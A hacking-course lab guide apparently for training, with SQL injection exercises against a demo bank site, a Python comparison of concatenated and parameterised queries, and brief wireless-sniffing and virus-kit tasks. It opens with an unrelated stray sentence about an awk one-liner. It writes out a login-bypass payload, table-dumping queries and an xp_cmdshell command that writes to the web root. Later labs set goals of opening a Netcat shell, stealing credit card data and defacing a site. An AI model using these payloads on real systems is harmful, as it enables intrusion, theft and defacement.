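Unlike the awk one-liner, which splits on dots and therefore also counts the "ARP, Request who-has ..." line as a talker, the regex only accepts IPv4 lines, so the counts are of IP packets only.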

SQL Injection Lab#1

1. Discover a list of databases:

select * from master..sysdatabases

2. Using a database called Juggybank, get a list of table names:


use juggybank;

select * from SysObjects where xType='U';

3. Using a database called Juggybank, get a list of information from the credit card table:

select * from juggybank..Creditcard;

4. Using a database called Juggybank, get a list of information from the UserInfo table:

select * from juggybank..userinfo;

5. Get a list of information from the UserInfo table where username='joker':

select * from juggybank..userinfo where username='joker';

6. Get a list of information from the UserInfo table where username='joker' and password='joker':

select * from juggybank..userinfo where username='joker' and password='joker';

7. Get a list of information from the UserInfo table where username='joker' and password='' (You should

get no records back because the password for the joker user is not blank):

select * from juggybank..userinfo where username='joker' and password='';

8. Get a list of information from the UserInfo table where username='joker' and password='' or return all rows if 1 is equal to 1 (the -- comments out the rest of the statement, and because AND binds tighter than OR the condition reads (username='joker' and password='') or 1=1, which every row satisfies):

select * from juggybank..userinfo where username='joker' and password='' or 1=1--;

Lab#2

Perform SQL injection on your web site.

Go to the Coastal Banc – Online Banking Demo web site on your desktop.


For login name, type joker.

For password, type joker.

Press submit. (This should work.)

Next, attempt to login with an invalid username and password. This should fail.

Next, enter the username of:

' OR 1=1--

And enter any password you wish. This should return the first record.
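What steps 7 and 8 of Lab#1 and the ' OR 1=1-- login of Lab#2 do to the query, as an added Python example (not the study guide's lab environment): the login form's string-concatenated query beside the same lookup with bound parameters. SQLite in memory stands in for the SQL Server behind Juggybank, the userinfo rows are constructed, and the ' OR 1=1-- bypass works the same way on both engines; the xp_cmdshell step of Lab#3 is SQL Server specific and is not modelled here.

```python
"""Login bypass with ' OR 1=1-- against a concatenated query, and the
parameterised query that is immune to it.  Added example; the table and
its rows are constructed."""
import sqlite3


def make_db():
    """Constructed stand-in for the Juggybank userinfo table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE userinfo (id INTEGER PRIMARY KEY, "
               "username TEXT, password TEXT)")
    db.executemany("INSERT INTO userinfo (username, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("joker", "joker"), ("batman", "robin")])
    return db


def login_vulnerable(db, username, password):
    """Builds the statement by concatenation, which is what the lab's login
    form does.  Returns the username of the first matching row (rowid order
    in SQLite), or None."""
    sql = ("SELECT username FROM userinfo WHERE username='" + username
           + "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Same lookup with bound parameters: the input is data, never SQL, so
    quotes and -- inside it cannot change the statement."""
    row = db.execute("SELECT username FROM userinfo WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("joker", "joker"), ("joker", ""), ("joker", "' OR 1=1--"),
                     ("' OR 1=1--", "anything")]:
        print("%-12r %-14r vulnerable=%-6r parameterized=%r"
              % (user, pw, login_vulnerable(db, user, pw), login_parameterized(db, user, pw)))
```

With the injected username the vulnerable statement becomes SELECT username FROM userinfo WHERE username='' OR 1=1--' AND password='anything': the comment swallows the password check and 1=1 matches every row, so the form logs you in as whoever sorts first (admin in this table), which is why Lab#2 says the first record comes back.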

Lab#3

Go to http://localhost/sql/client2.htm

In the Login name field, type the following to create a file on the hard drive of the web server:

';exec master..xp_cmdshell "echo you've-been-hacked > c:\inetpub\wwwroot\default.asp"--

Do not enter anything for the password and press submit.

Open http://localhost.

Lab#4

Using the same technique as SQL injection Lab#3 (command execution through xp_cmdshell), get Netcat started on your victim host and gain access to the command prompt.

Hint: xp_cmdshell and TFTP

Lab#5

Using SQL injection and the tools in the web hacking and web application hacking sections, attempt to

hack into another computer’s Coastal Bank web site.

Objectives:


Steal all credit card information

Deface the web site with the credit card information

Wireless Hacking

1. If you have a laptop with wireless connectivity, download NetStumbler and use it to find wireless networks.

2. Using Ethereal/Wireshark, sniff the wireless traffic.

Why do you see more traffic in a wireless network than in a wired switched network?

Viruses

Create your own virus using the Windows Scripting Host Worm Construction Kit.